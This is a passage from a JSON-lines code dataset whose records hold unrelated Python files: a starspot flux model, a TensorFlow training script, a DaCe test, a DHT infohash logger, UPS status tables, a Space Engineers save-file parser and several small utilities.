axis='y')\n old_cartesian = self.spots_cartesian\n new_cartesian = old_cartesian.transform(transform_matrix)\n\n # Use numpy array broadcasting to vectorize computations with spot radii\n broadcast_radii = (np.ones_like(rotational_phases.value)[:, np.newaxis]\n * self.spots_r)\n\n # Only include spot flux if it's on the observer facing side\n visible = (new_cartesian.z > 0).astype(int)\n\n # Compute radial position of spot\n r_spots = np.sqrt(new_cartesian.x**2 + new_cartesian.y**2)\n\n # Compute approximate spot area, given foreshortening in 3D\n spot_areas = (np.pi * broadcast_radii**2 *\n np.sqrt(1 - (r_spots/self.r)**2))\n\n # For a given spot contrast and limb darkening, compute missing flux\n spot_flux = (-1 * spot_areas * self.limb_darkening_normed(r_spots) *\n (1 - self.spot_contrasts)) * visible\n\n return self.unspotted_flux + np.sum(spot_flux, axis=1)\n\n def fractional_flux(self, times, t0=0):\n \"\"\"\n Compute stellar flux as a fraction of the unspotted stellar flux at\n ``times`` as the star rotates.\n\n Parameters\n ----------\n times: `~numpy.ndarray`\n Times\n t0 : float\n Reference epoch.\n\n Returns\n -------\n flux : `~numpy.ndarray`\n Fluxes at ``times``\n \"\"\"\n return self.flux(times, t0=t0)/self.unspotted_flux\n #\n # def flux_weighted_area(self, times, t0=0):\n # \"\"\"\n # Compute 
flux at ``times`` as the star rotates.\n #\n # Parameters\n # ----------\n # times: `~numpy.ndarray`\n # Times\n # t0 : float\n # Reference epoch.\n #\n # Returns\n # -------\n # flux : `~numpy.ndarray`\n # Fluxes at ``times``\n # \"\"\"\n # p_rot_d = self.rotation_period.to(u.d).value\n # rotational_phases = (((times - t0) % p_rot_d) / p_rot_d) * 2*np.pi*u.rad\n #\n # # Rotate the star about its axis assuming stellar inclination 90 deg\n # transform_matrix = rotation_matrix(rotational_phases[:, np.newaxis],\n # axis='y')\n # old_cartesian = self.spots_cartesian\n # new_cartesian = old_cartesian.transform(transform_matrix)\n #\n # # Use numpy array broadcasting to vectorize computations with spot radii\n # broadcast_radii = (np.ones_like(rotational_phases.value)[:, np.newaxis]\n # * self.spots_r)\n #\n # # Only include spot flux if it's on the observer facing side\n # visible = (new_cartesian.z > 0).astype(int)\n #\n # # Compute radial position of spot\n # r_spots = np.sqrt(new_cartesian.x**2 + new_cartesian.y**2)\n #\n # # Compute approximate spot area, given foreshortening in 3D\n # spot_areas = (np.pi * broadcast_radii**2 *\n # np.sqrt(1 - (r_spots/self.r)**2))\n #\n # area_spotted = np.sum(spot_areas * visible, axis=1) / (2 * np.pi * self.r**2)\n #\n # if hasattr(area_spotted, 'unit'):\n # area_spotted = area_spotted.value\n #\n # # For a given spot contrast and limb darkening, compute missing flux\n # flux_spots = np.sum((spot_areas * self.limb_darkening_normed(r_spots) *\n # (1 - self.contrast)) * visible, axis=1)\n #\n # missing_photosphere = (-1 * spot_areas *\n # self.limb_darkening_normed(r_spots)) * visible\n #\n # flux_photosphere = self.unspotted_flux + np.sum(missing_photosphere,\n # axis=1)\n #\n # photosphere_area = 1 - area_spotted\n #\n # # flux_weighted_spot_area = (flux_photosphere * photosphere_area +\n # # flux_spots * area_spotted)\n #\n # flux_weighted_spot_area = (flux_spots * area_spotted /\n # (flux_photosphere * photosphere_area))\n #\n # if hasattr(flux_weighted_spot_area, 'unit'):\n # flux_weighted_spot_area = flux_weighted_spot_area.value\n #\n # return flux_weighted_spot_area\n\n def _compute_image(self, n=3000, delete_arrays_after_use=True):\n \"\"\"\n Compute the stellar centroid using a numerical approximation.\n\n Parameters\n ----------\n n : int\n Generate a simulated image of the star with ``n`` by ``n`` pixels.\n\n Returns\n -------\n x_centroid : float\n Photocenter in the x dimension, in units of stellar radii\n y_centroid : float\n Photocenter in the y dimension, in units of stellar radii\n \"\"\"\n image = np.zeros((n, n))\n x = np.linspace(-self.r, self.r, n)\n y = np.linspace(-self.r, self.r, n)\n x, y = np.meshgrid(x, y)\n\n # Limb darkening\n irradiance = self.limb_darkening_normed(np.sqrt(x**2 + y**2))\n\n on_star = x**2 + y**2 <= self.r**2\n\n image[on_star] = irradiance[on_star]\n on_spot = None\n\n for cartesian, r, c in zip(self.spots_cartesian, self.spots_r,\n self.spot_contrasts):\n if cartesian.z > 0:\n r_spot = np.sqrt(cartesian.x**2 + cartesian.y**2)\n foreshorten_semiminor_axis = np.sqrt(1 - (r_spot/self.r)**2)\n\n a = r # Semi-major axis\n b = r * foreshorten_semiminor_axis # Semi-minor axis\n A = np.pi/2 + np.arctan2(cartesian.y.value, cartesian.x.value) # Semi-major axis rotation\n on_spot = (((x - cartesian.x) * np.cos(A) +\n (y - cartesian.y) * np.sin(A))**2 / a**2 +\n ((x - cartesian.x) * np.sin(A) -\n (y - cartesian.y) * np.cos(A))**2 / b**2 <= self.r**2)\n\n image[on_spot & on_star] *= c\n\n if delete_arrays_after_use:\n 
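# (The deletes below just release the large n-by-n work arrays before returning.)
# Geometry note on the spot test above: a circular spot of radius a whose center
# sits at projected radial distance r_spot is drawn as an ellipse, foreshortened
# along the radial direction: semi-minor axis b = a * sqrt(1 - (r_spot/self.r)**2),
# rotated by the angle A so that the short axis points outward. For example, a
# spot at r_spot = 0.5 * self.r keeps b ~ 0.866 * a, while a spot near the limb
# (r_spot -> self.r) collapses toward a thin sliver.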
del on_star\n if on_spot is not None:\n del on_spot\n del x\n del y\n del irradiance\n\n return image\n\n def limb_darkening(self, r):\n \"\"\"\n Compute the intensity at radius ``r`` for quadratic limb-darkening law\n with parameters ``Star.u1, Star.u2``.\n\n Parameters\n ----------\n r : float or `~numpy.ndarray`\n Stellar surface position in radial coords on (0, 1)\n\n Returns\n -------\n intensity : float\n Intensity in un-normalized units\n \"\"\"\n mu = np.sqrt(1 - r**2)\n u1 = self.u1\n u2 = self.u2\n return (1 - u1 * (1 - mu) - u2 * (1 - mu)**2) / (1 - u1/3 - u2/6) / np.pi\n\n def limb_darkening_normed(self, r):\n \"\"\"\n Compute the normalized intensity at radius ``r`` for quadratic\n limb-darkening law with parameters ``Star.u1, Star.u2``.\n\n Parameters\n ----------\n r : float or `~numpy.ndarray`\n Stellar surface position in radial coords on (0, 1)\n\n Returns\n -------\n intensity : float\n Intensity relative to the intensity at the center of the disk.\n \"\"\"\n return self.limb_darkening(r) / self.limb_darkening(0)\n\n def rotate(self, angle):\n \"\"\"\n Rotate the star, by moving the spots.\n\n Parameters\n ----------\n angle : `~astropy.units.Quantity`\n\n \"\"\"\n transform_matrix = rotation_matrix(angle, axis='y')\n\n old_cartesian = self.spots_cartesian\n new_cartesian = old_cartesian.transform(transform_matrix)\n self.spots_cartesian = new_cartesian\n self.rotations_applied += angle\n\n def derotate(self):\n self.rotate(-self.rotations_applied)\n self.rotations_applied = 0\n","sub_path":"libra/starspots/star.py","file_name":"star.py","file_ext":"py","file_size_in_byte":19023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"221769223","text":"\n\nnum = int(input())\t\t# Number of elemnts in an array\n\narr = []\t\t\t\t# Array of numbers\nte = input()\nte = te.split()\n\nfor i in range(num):\n\tarr.append(int(te[i]))\n\nfreq = [0 for i in range (128)]\t\t# Contains the number of times a particular Xor value comes (index represent the Xor value)\n\nfor i in range (num):\n\ttemp = [0 for k in range (128)]\n\n\tfor j in range (128):\n\t\tif j == arr[i]:\n\t\t\ttemp[j] = 1\n\t\telif freq[j] != 0:\n\t\t\ttemp [j^arr[i]] += freq[j]\n\tfor j in range (128):\n\t\tfreq[j] += temp[j]\n\nans = 0\n\nfor i in range(128):\n\tif freq[i]>1:\n\t\tans += freq[i]*(freq[i]-1)/2\n\nans = ans % 1000000007\nprint (int(ans))\n","sub_path":"panda.py","file_name":"panda.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"388301088","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright 2009 Benoit Chesneau \n#\n# This software is licensed as described in the file COPYING, which\n# you should have received as part of this distribution.\n\nimport os\nimport sys\n\nfrom ez_setup import use_setuptools\nif 'cygwin' in sys.platform.lower():\n min_version='0.6c6'\nelse:\n min_version='0.6a9'\ntry:\n use_setuptools(min_version=min_version)\nexcept TypeError:\n # If a non-local ez_setup is already imported, it won't be able to\n # use the min_version kwarg and will bail with TypeError\n use_setuptools()\n\nfrom setuptools import setup, find_packages\n\ndata_files = []\n\nfor dir, dirs, files in os.walk('templates'):\n data_files.append((os.path.join('couchapp', dir), \n [os.path.join(dir, file_) for file_ in files]))\n\nfor dir, dirs, files in os.walk('vendor'):\n data_files.append((os.path.join('couchapp', dir), \n [os.path.join(dir, 
file_) for file_ in files]))\n \n\nsetup(\n name = 'Couchapp',\n version = '0.3.4',\n url = 'http://github.com/couchapp/couchapp/tree/master',\n license = 'Apache License 2',\n author = 'Benoit Chesneau',\n author_email = 'benoitc@e-engura.org',\n description = 'Standalone CouchDB Application Development Made Simple.',\n long_description = \"\"\"CouchApp is a set of helpers and a jQuery plugin\n that conspire to get you up and running on CouchDB quickly and\n correctly. It brings clarity and order to the freedom of CouchDB's\n document-based approach.\"\"\",\n keywords = 'couchdb couchapp',\n platforms = ['any'],\n\n zip_safe = False,\n\n packages=find_packages('src'),\n package_dir={\n '': 'src'\n },\n data_files = data_files,\n include_package_data = True,\n entry_points = {\n 'console_scripts': [\n 'couchapp = couchapp.bin.couchapp_cli:main',\n ]\n },\n classifiers = [\n 'License :: OSI Approved :: Apache Software License',\n 'Intended Audience :: Developers',\n 'Intended Audience :: System Administrators',\n 'Development Status :: 4 - Beta',\n 'Programming Language :: Python',\n 'Operating System :: OS Independent',\n 'Topic :: Database',\n 'Topic :: Utilities',\n ],\n test_suite='tests',\n\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"312215559","text":"import os \nimport numpy as np \nimport tensorflow as tf \nimport input_data \nimport model \nimport matplotlib.pyplot as PLT\n# variable declarations \nN_CLASSES = 4\nIMG_W = 100 # resize images; if they are too large, training takes a long time \nIMG_H = 100 \nBATCH_SIZE = 32 \nCAPACITY = 200 \nMAX_STEP = 1000 # usually greater than 10K \nlearning_rate = 0.00001 # usually less than 0.0001 \npath=os.path.abspath('.')\n# fetch the batches \ntrain_dir = path+ '/pic' # input path for the training samples \nlogs_train_dir = path+'/logs' # path for storing the logs \n\ntrain, train_label, val, val_label = input_data.get_files(train_dir, 0.001) \n# training data and labels \ntrain_batch,train_label_batch = input_data.get_batch(train, train_label, IMG_W, IMG_H, BATCH_SIZE, CAPACITY) \n#print(train_label_batch) #Tensor(\"Reshape_7:0\", shape=(30,), dtype=int32)\n#print(train_batch) #Tensor(\"batch_9:0\", shape=(30, 64, 64, 3), dtype=float32)\n# test data and labels \nval_batch, val_label_batch = input_data.get_batch(val, val_label, IMG_W, IMG_H, BATCH_SIZE, CAPACITY) \n \n# define the training ops \ntrain_logits = model.inference(train_batch, BATCH_SIZE, N_CLASSES) # inference returns a softmax_linear\n#print (train_logits) ##Tensor(\"softmax_linear_4/softmax_linear_1:0\", shape=(30, 2), dtype=float32)\ntrain_loss = model.losses(train_logits, train_label_batch) # \ntrain_op = model.trainning(train_loss, learning_rate) \ntrain_acc = model.evaluation(train_logits, train_label_batch) # train_loss / train_op / train_acc are the ops to run inside sess.run \n \n# define the test ops \n#test_logits = model.inference(val_batch, BATCH_SIZE, N_CLASSES) # this would define a new graph \n#test_loss = model.losses(test_logits, val_label_batch) \n#test_acc = model.evaluation(test_logits, val_label_batch) \n \n# this merges all the log summaries \nsummary_op = tf.summary.merge_all() \n \n# create a session \nsess = tf.Session() \n# create a writer to write the log files \ntrain_writer = tf.summary.FileWriter(logs_train_dir, sess.graph) # can this be viewed in TensorBoard? 
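# Yes: to inspect the summaries written above, point TensorBoard at the same log
# directory from a shell, e.g.: tensorboard --logdir ./logs
# (./logs mirrors logs_train_dir above; adjust the path if you relocate the logs)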
\n#val_writer = tf.summary.FileWriter(logs_test_dir, sess.graph) \n# create a saver to store the trained model \nsaver = tf.train.Saver() \n# initialize all the nodes\nsess.run(tf.global_variables_initializer()) \n# queue monitoring \ncoord = tf.train.Coordinator() \nthreads = tf.train.start_queue_runners(sess=sess, coord=coord) \nlist_loss = []\nlist_acc = []\nlist_step = []\n# train batch by batch \ntry: \n # run MAX_STEP training steps, one batch per step \n for step in np.arange(MAX_STEP): #100\n if coord.should_stop(): # a class that manages stopping the threads\n break \n # run the following op nodes; question: why is train_logits not run here? Because train_logits is already run inside train_loss\n _, tra_loss, tra_acc = sess.run([train_op, train_loss, train_acc]) \n \n # every 100 steps, print the current loss and acc, log a summary and write it with the writer \n if step % 100 == 0: \n print('Step %d, train loss = %.2f, train accuracy = %.2f%%' %(step, tra_loss, tra_acc*100.0)) \n list_loss.append(tra_loss)\n list_acc.append(tra_acc*100)\n list_step.append(step/10)\n PLT.plot(list_step,list_acc)\n PLT.plot(list_step,list_loss)\n summary_str = sess.run(summary_op) \n train_writer.add_summary(summary_str, step) \n # save the trained model once \n if (step + 1) == MAX_STEP:\n print(\"saving ...\")\n checkpoint_path = os.path.join(logs_train_dir, 'model.ckpt') \n saver.save(sess, checkpoint_path, global_step=step) \n constant_graph = tf.graph_util.convert_variables_to_constants(sess, sess.graph_def, [\"softmax_linear/softmax_linear_1\"])\n with tf.gfile.FastGFile(\"zxf.pb\", mode='wb') as f:\n f.write(constant_graph.SerializeToString())\n print(\"saving pb ...\")\n print(list_loss)\n print(list_acc)\n print(list_step)\n### exception handling \nexcept tf.errors.OutOfRangeError: \n print('Done training -- epoch limit reached') \n \nfinally: \n coord.request_stop() ","sub_path":"新建文件夹/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"239946556","text":"#!/usr/bin/env python\nfrom __future__ import print_function\n\nimport gc\nimport argparse\nimport dace\nimport numpy as np\nimport dace.frontend.common as np_frontend\n\nimport os\nfrom timeit import default_timer as timer\n\nSDFG = dace.sdfg.SDFG\n\nM = dace.symbol('M')\nN = dace.symbol('N')\nK = dace.symbol('K')\nL = dace.symbol('L')\n\nA = dace.ndarray([L, K, M, N], dtype=dace.float64)\nB = dace.ndarray([L, N, M], dtype=dace.float64)\n\nif __name__ == \"__main__\":\n print(\"==== Program start ====\")\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"M\", type=int, nargs=\"?\", default=128)\n parser.add_argument(\"N\", type=int, nargs=\"?\", default=128)\n parser.add_argument(\"L\", type=int, nargs=\"?\", default=5)\n parser.add_argument(\"K\", type=int, nargs=\"?\", default=10)\n args = vars(parser.parse_args())\n\n M.set(args[\"M\"])\n N.set(args[\"N\"])\n K.set(args[\"K\"])\n L.set(args[\"L\"])\n\n print('Matrix transpose %dx%dx' % (M.get(), N.get()))\n\n # Initialize arrays: Randomize A and B\n A[:] = np.random.rand(L.get(), K.get(), M.get(),\n N.get()).astype(dace.float64.type)\n B[:] = np.random.rand(L.get(), N.get(), M.get()).astype(dace.float64.type)\n\n A_regression = np.ndarray(\n [L.get(), K.get(), M.get(), N.get()], dtype=np.float64)\n B_regression = np.ndarray([L.get(), N.get(), M.get()], dtype=np.float64)\n A_regression[:] = A[:]\n B_regression[:] = B[:]\n\n mtr = SDFG(name='mtr')\n mtr.add_node(\n np_frontend.op_impl.matrix_transpose_s('A',\n A.shape,\n dace.float64,\n False,\n 'B',\n B.shape,\n dace.float64,\n A_index=[2, 3],\n B_index=[4],\n label='mtr'))\n\n mtr(A=A, B=B)\n B_regression[4] = np.transpose(A_regression[2, 3])\n\n rel_error = 
(np.linalg.norm((B_regression - B).flatten(), ord=2) /\n np.linalg.norm(B_regression.flatten(), ord=2))\n print(\"Relative error:\", rel_error)\n print(\"==== Program end ====\")\n exit(0 if rel_error <= 1e-15 else 1)\n","sub_path":"tests/numpy/matrix_transpose_s.py","file_name":"matrix_transpose_s.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"632452331","text":"import os\nfrom glob import glob\nfrom tqdm.auto import tqdm\nimport numpy as np\nfrom ensmallen_graph import EnsmallenGraph\nfrom embiggen import GraphTransformer, EdgeTransformer\n\n#try:\n# from tsnecuda import TSNE\n#except ModuleNotFoundError:\nfrom MulticoreTSNE import MulticoreTSNE as TSNE\n\nembedding_path = \"./FOURTH/SkipGram_embedding.npy\"\n\ngraph = EnsmallenGraph.from_csv(\n edge_path=\"/global/scratch/marcin/N2V/MicrobeEnvironmentGraphLearn/ENIGMA_data/masterG.edgelist_col12_head.tsv\",\n sources_column=\"subject\",\n destinations_column=\"object\",\n directed=False\n)\n\n\nnegative_graph = graph.sample_negatives(42, graph.get_edges_number(), False)\n\nembedding = np.load(embedding_path)\n\nfor method in tqdm(EdgeTransformer.methods, desc=\"Methods\", leave=False):\n tsne_path = f\"tsne_edges_microbeenv\"\n if os.path.exists(tsne_path):\n continue\n transformer = GraphTransformer(method)\n transformer.fit(embedding)\n positive_edges = transformer.transform(graph)\n negative_edges = transformer.transform(negative_graph)\n edges = np.vstack([positive_edges, negative_edges])\n nodes = np.concatenate([\n np.ones(positive_edges.shape[0]),\n np.zeros(negative_edges.shape[0])\n ])\n indices = np.arange(0, nodes.size)\n np.random.shuffle(indices)\n edges = edges[indices]\n nodes = nodes[indices]\n np.save(f\"tsne_edges_microbeenv_labels\", nodes)\n tsne = TSNE(verbose=True)\n np.save(\n tsne_path,\n tsne.fit_transform(edges)\n )","sub_path":"notebooks/TSNE_edge_types_visualization_microbeenv.py","file_name":"TSNE_edge_types_visualization_microbeenv.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"338030849","text":"#encoding: utf-8\r\nfrom kademlia.kdht import Server\r\nfrom kademlia.ktable import KTable\r\nfrom kademlia.utils import random_id\r\n\r\nclass Master(object):\r\n def __init__(self, f):\r\n self.f = f\r\n\r\n def log(self, infohash):\r\n self.f.write(infohash.encode(\"hex\")+\"\\n\")\r\n self.f.flush()\r\n \r\ntry:\r\n f = open(\"infohash.log\", \"a\")\r\n\r\n k = KTable(random_id())\r\n m = Master(f)\r\n\r\n s = Server(k, m)\r\n s.start() \r\nexcept KeyboardInterrupt:\r\n s.socket.close()","sub_path":"simDHT.py","file_name":"simDHT.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"59291600","text":"import pygame\nimport time\nimport random\n#note that there is a pygame music function\n# but this only allows single channel (because it is streamed)\n# it is possible to play music files over sound files\n#this implyes that sound is played from ram so needs to\n#consider file size of all file to be played\n# files can be replayed\n\n#pygame.init()\npygame.mixer.init()\n#######################################\ncount = pygame.mixer.Sound(\"file1.wav\")\nmusic = pygame.mixer.Sound(\"dogyInWindow.wav\")\n\n#!/usr/bin/env python\n\nimport RPi.GPIO as GPIO\nfrom mfrc522 import SimpleMFRC522\nreader = 
SimpleMFRC522()\n\n#plays multiple files when read, simultaneously\n##can use count as delay, or delay, or if last !< current, etc\nwhile True:\n id, text = reader.read()\n \n if id == (576445216648):\n print ('Tag 1 Found')\n pygame.mixer.Sound.play(count)\n time.sleep(2)\n continue\n \n elif id == (561186360885):\n print ('Tag 2 Found')\n pygame.mixer.Sound.play(music)\n time.sleep(2)\n continue\n \n elif id == (427164244981):\n print ('Tag 3 Found')\n time.sleep(2)\n pygame.mixer.fadeout(2000) # fade out all channels; 2000 ms is an assumed duration -- the original line (pygame.mixerfadeout) was not a valid call\n \n \n## elif id == ():\n# print ('Tag 4 Stick Found')\n# pygame.mixer.Sound.play(music)\n # time.sleep(2)\n # continue\n \n####################################\n#pygame.mixer.music.load(\"dogyInWindow.wav\")\n#pygame.mixer.music.play(2)\n#pygame.mixer.music.load(\"file1.wav\")\n#pygame.mixer.music.play(2)\n\n\nGPIO.cleanup()\n","sub_path":"RaspberryPi_ToyFiles/MultiSoundTest.py","file_name":"MultiSoundTest.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"581845602","text":"battery_status = {\n '1' : 'Unknown',\n '2' : 'Normal',\n '3' : 'Low',\n '4' : 'Depleted'\n}\n\nbattery_abm_status = {\n '0' : 'Unknown',\n '1' : 'Charging',\n '2' : 'Discharging',\n '3' : 'Floating',\n '4' : 'Resting',\n '5' : 'Unknown',\n '6' : 'Disconnected',\n '7' : 'Under Test',\n '8' : 'Check Battery',\n}\n\nbattery_failure = {\n '1' : 'Yes',\n '2' : 'No'\n}\n\nbattery_not_present = {\n '1' : 'Yes',\n '2' : 'No'\n}\n\nbattery_low_capacity = {\n '1' : 'Yes',\n '2' : 'No'\n}\n\nbattery_test_status = {\n '1' : 'Unknown',\n '2' : 'Passed',\n '3' : 'Failed',\n '4' : 'In Progress',\n '5' : 'Not Supported',\n '6' : 'Inhibited',\n '7' : 'Scheduled',\n}\n\noutput_source = {\n '1' : 'Other',\n '2' : 'None',\n '3' : 'Normal',\n '4' : 'Bypass',\n '5' : 'Battery',\n '6' : 'Booster',\n '7' : 'Reducer',\n '8' : 'Parallel Capacity',\n '9' : 'Parallel Redundant',\n '10' : 'High Efficiency Mode',\n '11' : 'Maintenance Bypass',\n '12' : 'ESS Mode',\n}\n\ntest_results = {\n '1' : 'Done Pass',\n '2' : 'Done Warning',\n '3' : 'Done Error',\n '4' : 'Aborted',\n '5' : 'In Progress',\n '6' : 'No Tests Initiated',\n}\n\ninput_ids = {\n '1' : 'phase1toN',\n '2' : 'phase2toN',\n '3' : 'phase3toN',\n '4' : 'phase1to2',\n '5' : 'phase2to3',\n '6' : 'phase3to1'\n}\n\ninput_names = {\n '1' : 'L1/A',\n '2' : 'L2/B',\n '3' : 'L3/C',\n '4' : 'L1-L2/A-B',\n '5' : 'L2-L3/B-C',\n '6' : 'L3-L1/C-A'\n}\n\nconfig_audible_alarm = {\n '1' : 'Disabled',\n '2' : 'Enabled',\n '3' : 'Muted'\n}","sub_path":"backend/mm_ups_rt/src/mibs.py","file_name":"mibs.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"10291368","text":"import sys\ninput = sys.stdin.readline\nn = int(input())\nli = []\nfor _ in range(n):\n word = input().rstrip()\n word_count = len(word)\n li.append((word, word_count))\n\n# remove duplicates\nli = list(set(li))\n\n# sort by word length first, then alphabetically\nli.sort(key = lambda word: (word[1], word[0]))\n\nfor i in li:\n print(i[0])","sub_path":"doyeon/BOJ/★정렬/20210401_boj_1181_단어 정렬.py","file_name":"20210401_boj_1181_단어 정렬.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"202198132","text":"import sys\nimport os\nimport re\nfrom collections import defaultdict\n\t\t\nsample_dict = defaultdict(list)\n\n# read in files from the command line\nINPUT_FILE_NAME = r'KW-\\d+_HTSeq\\.txt' # regex for 
file name\nSAMPLE_NAME = r'KW-\\d+' # regex for sample namec\n\noutput_file_name = \"HTSeq_count_file_new.txt\"\nheader = [\"sample_ID\", \"> 10\", \">20\", \"ERCC >10\", \"ERCC > 20\"]\ndata_file_directory, date = sys.argv[1:]\n\n# read each file from the directory\nfor file_name in os.listdir(data_file_directory):\n\n\t# only read files with the format of the sorted bam file\n\tif re.match(INPUT_FILE_NAME, file_name):\n\t\tprint(file_name)\n\t\tten_count = 0\n\t\ttwenty_count = 0\n\t\tERCC_ten_count = 0\n\t\tERCC_twenty_count = 0\n\n\t\t# rename the complete filepath to include the name of the file\n\t\tfile_path = os.path.join(data_file_directory, file_name)\n\n\t\t# # name the input file\n\t\ttxt_input = file_path\n\n\t\t# name the sample based on the file name\n\t\tsample_name = ''.join(re.findall(SAMPLE_NAME, file_name)) + \"_\" + date\n\n\t\twith open(file_path, \"r\") as HTSeq_file:\n\t\t\tfor line in HTSeq_file:\n\t\t\t\tline = line.strip().split('\\t')\n\n\t\t\t\tif int(line[1]) >= 10 and \"ERCC\" not in line[0]:\n\t\t\t\t\tten_count += 1\n\n\t\t\t\tif int(line[1]) >= 20 and \"ERCC\" not in line[0]:\n\t\t\t\t\ttwenty_count += 1\n\n\t\t\t\tif int(line[1]) >= 10 and \"ERCC\" in line[0]:\n\t\t\t\t\tERCC_ten_count += 1\n\n\t\t\t\tif int(line[1]) >= 20 and \"ERCC\" in line[0]:\n\t\t\t\t\tERCC_twenty_count += 1\n\n\t\tcount_list = [str(ten_count), str(twenty_count), str(ERCC_ten_count), str(ERCC_twenty_count)]\n\n\t\tsample_dict[sample_name].extend(count_list)\t\t\n\nwith open(output_file_name, 'w') as output_file:\n\toutput_file.write('\\t'.join(header) + '\\n')\n\tfor item in sample_dict:\n\t\toutput_file.write(item + '\\t' + '\\t'.join(sample_dict[item]) + '\\n')\n\n\n","sub_path":"HTSeq_analysis_multiple_new.py","file_name":"HTSeq_analysis_multiple_new.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"374583870","text":"# -*- coding: utf-8 -*-\n\"\"\"Shim providing notebook.nbextensions stuff from 4.2 for earlier versions.\"\"\"\n\ntry:\n from notebook.nbextensions import (\n GREEN_OK, RED_X, BaseNBExtensionApp, _get_config_dir,\n )\nexcept ImportError:\n from ._compat.nbextensions import (\n GREEN_OK, RED_X, BaseNBExtensionApp, _get_config_dir,\n )\n\n__all__ = [\n 'GREEN_OK', 'RED_X', 'BaseNBExtensionApp', '_get_config_dir',\n]\n","sub_path":"src/jupyter_nbextensions_configurator/notebook_compat/nbextensions.py","file_name":"nbextensions.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"403408340","text":"class Sbc:\n \"\"\"Read and parse the SBC world file.\"\"\"\n\n def __init__(self, sbc_filename):\n \"\"\"Init for SBC reading and parsing.\"\"\"\n\n import xml.etree.ElementTree as ET\n self.factions = {}\n self.playerDict = {}\n self.world = {}\n self.mods = {}\n\n tree = ET.parse(sbc_filename)\n root = tree.getroot()\n\n # app_version = root.find('AppVersion').text\n\n settings = {}\n for setting in root.find('Settings'):\n settings[setting.tag] = setting.text\n #TODO: work with BlockTypeLimits dictionary\n self.world['settings'] = settings\n self.world['appVersion'] = root.find('AppVersion').text\n self.world['sessionName'] = root.find('SessionName').text\n self.world['lastSaveTime'] = root.find('LastSaveTime').text\n self.world['description'] = root.find('Description').text\n self.world['elapsedGameTime'] = root.find('ElapsedGameTime').text\n\n mods = root.find('Mods')\n for 
eachMod in mods.iter('ModItem'):\n mod_id = eachMod.find('PublishedFileId').text\n self.mods[mod_id] = {}\n mod_friendly_name = eachMod.attrib['FriendlyName']\n\n self.mods[mod_id]['url'] = 'http://steamcommunity.com/sharedfiles/filedetails/?id=' + mod_id\n self.mods[mod_id]['friendly_name'] = mod_friendly_name\n\n self.thisPlayerDict = {}\n playerToolbarSlotCount = 0\n playerConnected = \"false\"\n\n for players in root.iter('Identities'):\n for eachPlayer in players.iter('MyObjectBuilder_Identity'):\n # loginTime=\"\" # TODO: these come from log parser class\n # logoutTime=\"\"\n displayName = eachPlayer.find('DisplayName').text\n steamID = eachPlayer.find('CharacterEntityId').text\n inGameID = eachPlayer.find('IdentityId').text\n last_login_time = eachPlayer.find('LastLoginTime').text\n last_logout_time = eachPlayer.find('LastLogoutTime').text\n if eachPlayer.find('Model') is not None:\n model = eachPlayer.find('Model').text\n else:\n model = None\n\n for playersData in root.findall(\"./AllPlayersData/dictionary/item\"):\n playerDataClientID = playersData.find('./Key/ClientId').text\n playerDataIdentityID = playersData.find('./Value/IdentityId').text\n\n if playerDataIdentityID == inGameID:\n playerConnected = playersData.find('./Value/Connected').text\n playerToolbarSlotCount = len(playersData.findall('./Value/Toolbar/Slots/Slot'))\n\n self.thisPlayerDict[\"username\"] = displayName\n self.thisPlayerDict[\"inGameID\"] = inGameID\n self.thisPlayerDict[\"steamID\"] = steamID\n self.thisPlayerDict[\"model\"] = model\n self.thisPlayerDict[\"playerDataClientID\"] = playerDataClientID\n self.thisPlayerDict[\"playerConnected\"] = playerConnected\n self.thisPlayerDict[\"playerToolbarSlotCount\"] = str(playerToolbarSlotCount)\n self.thisPlayerDict[\"lastLoginTime\"] = last_login_time\n self.thisPlayerDict[\"lastLogoutTime\"] = last_logout_time\n # thisPlayerDict{\"firstSeen\"}, today)\n # self.thisPlayerDict[\"loginTime\"] = loginTime # TODO: these come from log parser class\n # self.thisPlayerDict[\"logoutTime\"] = logoutTime\n # self.thisPlayerDict[\"foundKnownUser\"] = foundKnownUser ## if he isn't in users.xml, he's new\n\n self.playerDict[inGameID] = self.thisPlayerDict\n\n del self.thisPlayerDict\n self.thisPlayerDict = {}\n\n # faction = {}\n for eachFaction in root.iter('MyObjectBuilder_Faction'):\n faction = {}\n factionID = eachFaction.find('FactionId')\n tag = eachFaction.find('Tag')\n name = eachFaction.find('Name')\n description = eachFaction.find('Description')\n factionSize = len(eachFaction.find('Members'))\n\n faction['factionId'] = factionID.text\n faction['tag'] = tag.text\n faction['name'] = name.text\n if hasattr(description, 'text'):\n faction['description'] = description.text\n faction['size'] = factionSize\n\n memberList = {}\n for member in eachFaction.iter('MyObjectBuilder_FactionMember'):\n memberPlayerID = member.find('PlayerId')\n memberIsLeader = member.find('IsLeader')\n 